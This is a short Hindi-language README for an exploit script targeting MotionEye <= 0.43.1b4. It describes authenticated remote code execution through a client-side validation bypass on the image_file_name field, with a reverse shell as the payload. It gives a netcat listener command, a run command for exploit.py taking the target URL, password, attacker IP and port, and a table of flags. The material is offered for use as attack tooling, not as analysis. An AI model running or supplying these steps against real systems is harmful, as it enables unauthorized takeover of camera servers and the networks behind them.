
MotionEye <= 0.43.1b4 के लिए प्रमाणित RCE शोषण, image_file_name फ़ील्ड पर क्लाइंट-साइड सत्यापन बाईपास के माध्यम से। इसमें रिवर्स शेल पेलोड डिलीवरी शामिल है।
प्रमाणित RCE MotionEye <= 0.43.1b4 में image_file_name फ़ील्ड पर क्लाइंट-साइड सत्यापन बाईपास के माध्यम से।
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| झंडा | विवरण |
|---|---|
-t | लक्ष्य होस्ट/URL (डिफ़ॉल्ट पोर्ट 8765) |
-u | उपयोगकर्ता नाम (डिफ़ॉल्ट: admin) |
-p | पासवर्ड - वही मान जो आप GUI में टाइप करते हैं / motion.conf में पाया गया |
-lh | आपका हमलावर IP |
-lp | सुनने वाला पोर्ट |
--camera-id | कैमरा ID (यदि छोड़ा जाए तो स्वतः पता लगाया जाता है) |